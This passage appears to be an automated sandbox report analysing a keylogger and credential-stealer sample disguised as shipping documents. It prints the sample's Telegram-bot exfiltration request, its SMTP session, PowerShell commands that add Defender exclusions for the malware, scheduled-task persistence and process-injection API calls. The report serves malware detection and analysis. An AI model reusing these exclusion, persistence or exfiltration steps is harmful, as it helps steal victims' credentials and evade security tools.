2024-10-29 09:32:29 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	51300	149.154.167.220	443	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 09:32:30 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2029/10/2024%20/%2021:03:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-29 09:32:30 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 29 Oct 2024 09:32:30 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-29 09:32:30 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 29, 2024 10:32:31.787811995 CET	587	51301	166.62.28.124	192.168.2.8	220-sg2plzcpnl505992.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Tue, 29 Oct 2024 02:32:31 -0700 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 29, 2024 10:32:31.788042068 CET	51301	587	192.168.2.8	166.62.28.124	EHLO 103386
Oct 29, 2024 10:32:32.123368025 CET	587	51301	166.62.28.124	192.168.2.8	250-sg2plzcpnl505992.prod.sin2.secureserver.net Hello 103386 [173.254.250.72] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Oct 29, 2024 10:32:32.138971090 CET	51301	587	192.168.2.8	166.62.28.124	STARTTLS
Oct 29, 2024 10:32:32.475183964 CET	587	51301	166.62.28.124	192.168.2.8	220 TLS go ahead
Oct 29, 2024 10:32:36.692661047 CET	587	51302	166.62.28.124	192.168.2.8	421 Too many concurrent SMTP connections from this IP address; please try again later.

Target ID:	0
Start time:	05:32:04
Start date:	29/10/2024
Path:	C:\Users\user\Desktop\rShippingDocuments240384.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rShippingDocuments240384.exe"
Imagebase:	0xf50000
File size:	789'504 bytes
MD5 hash:	70338F79BB11EE88003EA5F2D0D363C1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:32:05
Start date:	29/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe"
Imagebase:	0x900000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:32:05
Start date:	29/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:32:05
Start date:	29/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tdcorV.exe"
Imagebase:	0x900000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:32:06
Start date:	29/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:32:06
Start date:	29/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp"
Imagebase:	0x4b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:32:06
Start date:	29/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:32:06
Start date:	29/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xa60000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	05:32:07
Start date:	29/10/2024
Path:	C:\Users\user\AppData\Roaming\tdcorV.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\tdcorV.exe
Imagebase:	0x5d0000
File size:	789'504 bytes
MD5 hash:	70338F79BB11EE88003EA5F2D0D363C1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 32%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:32:08
Start date:	29/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff605670000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:32:10
Start date:	29/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp329E.tmp"
Imagebase:	0x4b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:32:10
Start date:	29/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:32:11
Start date:	29/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xe10000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3917772497.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3920889252.000000000323F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	12%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.9%
Total number of Nodes:	207
Total number of Limit Nodes:	8

Executed Functions

Function 07C32F68 Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07C32FEF

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 3b3f37ef622de0e6c1c83b89484205e9736a257b55e8f3b042e80767a8ac573b
Instruction ID: 8799e1ea2020564cd81f5b109103933856858eed081d01cb9b70a2ff819356f7
Opcode Fuzzy Hash: 3b3f37ef622de0e6c1c83b89484205e9736a257b55e8f3b042e80767a8ac573b
Instruction Fuzzy Hash: D421E2B5901359DFCB10CF9AD884ADEFBF5FB48310F14852AE918A7210C379A544CFA1

Function 07C32F70 Relevance: 1.6, APIs: 1, Instructions: 55nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07C32FEF

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: b4a9a0c96de2dda60d64c78d9dbf73a8854b18aa954366f0b7b1c63eef42c4ef
Instruction ID: 92f0659c8a2907b08c7a016154611355ebb95098f717bd87f23495965cc0ef34
Opcode Fuzzy Hash: b4a9a0c96de2dda60d64c78d9dbf73a8854b18aa954366f0b7b1c63eef42c4ef
Instruction Fuzzy Hash: 0E21CEB5901759EFCB20CF9AD884ADEFBF4FB48310F10842AE918A7210D375A944CFA5

Function 07C30308 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 355962cf16a7ca222b0a5edb6594ce01c1cdd95501383a986880441b44e2a391
Instruction ID: 40afe623e568079217f658e206036b4a83f931cc681b154feeb439efd55a3820
Opcode Fuzzy Hash: 355962cf16a7ca222b0a5edb6594ce01c1cdd95501383a986880441b44e2a391
Instruction Fuzzy Hash: 69428FB4E11219CFDB64CFA9C985B9DBBB6FF48301F1481A9E809A7355D730AA81CF50

Function 07C1EF18 Relevance: .5, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494008683.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c10000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3594891721d083635bc33eb28fe0a9fba32dbe5e98551476fcc7d826563026b
Instruction ID: b2d02598c043e5737f87efee52414bf25d932d6ddb7c5af9d33df47408fc9692
Opcode Fuzzy Hash: a3594891721d083635bc33eb28fe0a9fba32dbe5e98551476fcc7d826563026b
Instruction Fuzzy Hash: D832C3B4901219CFEB64DF69C584A8EFBB2BF49316F55C1A9C448AB211CB30DD85CFA4

Function 09843178 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494654658.0000000009840000.00000040.00000800.00020000.00000000.sdmp, Offset: 09840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9840000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12504d4ef7fb3c8cdf6b48ee58a1091adb42c0d8b513d814b406e0012573c9fd
Instruction ID: e2085b73bb1581a2bb3d983ecd42efc4956d8c902e7d90b00ee4f952e765f86e
Opcode Fuzzy Hash: 12504d4ef7fb3c8cdf6b48ee58a1091adb42c0d8b513d814b406e0012573c9fd
Instruction Fuzzy Hash: 92C19C717007088BDB19EF79E56476EB7E6AF98600F14846EE14ACB390DF35E901CB62

Function 07C30303 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb136e1f33478761159f3e8aa32c02071d89b7b9cfbd3a73a21dcb3c966451f
Instruction ID: 69fad17b0113c2309457103f95fdaaeb479f8f15ddba7ed65c057ee537976856
Opcode Fuzzy Hash: 2cb136e1f33478761159f3e8aa32c02071d89b7b9cfbd3a73a21dcb3c966451f
Instruction Fuzzy Hash: D8619875E01218CFEB18CF6AD985B9DBBB6FF88301F1481AAE409A7354DB319981CF50

Function 07C34CC0 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e302b23afb0e56852ae1dbee734623fd1383f5102add3c0d9b725b4bfcbebe4a
Instruction ID: da3545df3e601d053bad4314e14c2b4a99fa0ba9e3e938bbc89441ca23a52824
Opcode Fuzzy Hash: e302b23afb0e56852ae1dbee734623fd1383f5102add3c0d9b725b4bfcbebe4a
Instruction Fuzzy Hash: 065182B5D006199FDF08DFEAC8446AEFBB2FF89311F10806AD419AB254DB745A46CF50

Function 07C1EF11 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494008683.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c10000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47c735965c22f7f735306dd3790606040a2717834ea2830cdce800865d2bb004
Instruction ID: 9aa7bd84e81f3cf630482840035751316013f39e32efb82d8a4886d6404f4b36
Opcode Fuzzy Hash: 47c735965c22f7f735306dd3790606040a2717834ea2830cdce800865d2bb004
Instruction Fuzzy Hash: 0741D9B1E006198FEB58DFAAC84179EBBB2BFC9200F14C0BAC45CA6215EA304A459F51

Function 07C34CB3 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a479e83df14beb6a5dc2146b9b5aec6540e93b1fb3f82025085bf755fd0011f0
Instruction ID: e2bd191e4a976453f65728874550856e9cfe9cbabfe341dbf0617a8385d76cd3
Opcode Fuzzy Hash: a479e83df14beb6a5dc2146b9b5aec6540e93b1fb3f82025085bf755fd0011f0
Instruction Fuzzy Hash: 7F41C4B5E006198FDB08DFAAC8446AEFBF2BF89310F14C16AD418AB254DB345A46CF40

Function 07C3E36C Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C3E5AE

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0695f00e8d8a12a5ac0bae9045d249fe7574d8496af5a318a5ea3dd4659ac471
Instruction ID: 12826b48914d36fb8f305746c76334df16c4f5afe6b6d5551f61853e73d6d8b0
Opcode Fuzzy Hash: 0695f00e8d8a12a5ac0bae9045d249fe7574d8496af5a318a5ea3dd4659ac471
Instruction Fuzzy Hash: 1EA16FB1D00719CFEB20DFA9C8857DEBBB2BF48314F148569E809A7240DB759A81CF91

Function 07C3E378 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C3E5AE

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7aeafedaa1e1837a6a3933809ef9f5b59a8ce3b3a49da9fdb61eaa241864cd4a
Instruction ID: 48d2161bfc8166545c2ab3c197dddbc01ba20d579edec43691a3ed254163104e
Opcode Fuzzy Hash: 7aeafedaa1e1837a6a3933809ef9f5b59a8ce3b3a49da9fdb61eaa241864cd4a
Instruction Fuzzy Hash: 3E916FB1D00719CFEB20DFA9C8857DEBBB2BF48314F148569E809A7240DB759A85CF91

Function 0579C038 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1491679501.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5790000_rShippingDocuments240384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bce3e0f36405548526894298e720ff95fa43d2ba787de509a9b6addb076cace
Instruction ID: 5b7b9e30f75a7769057e3dcef3a3b0a8c60d6d10280ef8663a6d075608df9dc4
Opcode Fuzzy Hash: 3bce3e0f36405548526894298e720ff95fa43d2ba787de509a9b6addb076cace
Instruction Fuzzy Hash: DB8169B0A00B058FDB29CF69E44576ABBF5FF88200F10892DD44ACBA50DB75E845DFA5

Function 05794598 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 05796B31

Memory Dump Source

Source File: 00000000.00000002.1491679501.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5790000_rShippingDocuments240384.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c65db2c920498f9fbd95365aecc5a7b939bd74445180fd49afe07101eecdb94d
Instruction ID: 77537306c85b5f49ef51c4abcb17b87932177c43f61fdfaa4e3b009494ee6d1a
Opcode Fuzzy Hash: c65db2c920498f9fbd95365aecc5a7b939bd74445180fd49afe07101eecdb94d
Instruction Fuzzy Hash: C041C1B0C00719CFDB24CFAAC844B9EBBF5BF49704F20816AD409AB251DB756945DF91

Function 05796A75 Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 05796B31

Memory Dump Source

Source File: 00000000.00000002.1491679501.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5790000_rShippingDocuments240384.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8325aa6c3c5f74b8ee0d39880e41f53cf3a63246ab6b6e98d7c21fc7a1ca682f
Instruction ID: a5e1833ceb9022f6db5ab766bba1c61930d43b034c23da53ce1d22faf1ce2940
Opcode Fuzzy Hash: 8325aa6c3c5f74b8ee0d39880e41f53cf3a63246ab6b6e98d7c21fc7a1ca682f
Instruction Fuzzy Hash: 2041D2B0C00719CFDB24CFAAC844B9EBBF5BF49704F20816AD408AB251DB756945DF90

Function 07C1ADC1 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 07C1AE5F

Memory Dump Source

Source File: 00000000.00000002.1494008683.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c10000_rShippingDocuments240384.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: f2e56efc7385406e543ce05c74df8c42ff757f5484ab425e43c2e37be78d0e4f
Instruction ID: 273b410f37c6910638ed4763f7e2aa15461d86c4970fa75fadee36a05f385403
Opcode Fuzzy Hash: f2e56efc7385406e543ce05c74df8c42ff757f5484ab425e43c2e37be78d0e4f
Instruction Fuzzy Hash: A431E2B59013099FDB10CF9AD880A9EBBF5FF48320F14842AE819A7310D375A955CFA1

Function 07C3E0E8 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07C3E180

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3c74adc7ed4943b1c70b3a7ce88865e04821f54b980fc8f1c32ac2ce019e905a
Instruction ID: 9cc5d1d0d2e797f49d656c19a55af4b4aaf2642e15f1235660f36971f20218c1
Opcode Fuzzy Hash: 3c74adc7ed4943b1c70b3a7ce88865e04821f54b980fc8f1c32ac2ce019e905a
Instruction Fuzzy Hash: EE2117B1900349DFDB14CFA9C8817EEBBF1FF48310F14842AE559A7251C7799941DBA1

Function 07C1ADC8 Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 07C1AE5F

Memory Dump Source

Source File: 00000000.00000002.1494008683.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c10000_rShippingDocuments240384.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 4510486992609b880823f5cbdbe9690d35e0b34f65f91153f2823578d14dfe38
Instruction ID: 4a92f1f739bace2a2e018b5b21d6d71b152dc57b72830413e69b4a8e57be4370
Opcode Fuzzy Hash: 4510486992609b880823f5cbdbe9690d35e0b34f65f91153f2823578d14dfe38
Instruction Fuzzy Hash: 4321C0B59013499FDB10CF9AD884A9EBBF5BF48310F14842AE919A7310D375A954CFA1

Function 07C3E1D9 Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07C3E260

Memory Dump Source

Source File: 00000000.00000002.1494084970.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_rShippingDocuments240384.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: fb7800b7f5da4379422e61dce0568a640b1a7d5e27f1a3f18ee729a0a1ed6e6d
Instruction ID: af50d66054f08c72b58aa41f2e8b11c91d936e8f8cf86575407fdc30123b3b0f
Opcode Fuzzy Hash: fb7800b7f5da4379422e61dce0568a640b1a7d5e27f1a3f18ee729a0a1ed6e6d
Instruction Fuzzy Hash: 3F2125B1801349DFDB10CFAAC884BEEBBF5FF48310F14842AE958A7241C7799901DBA5

Function 07C3E0F0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

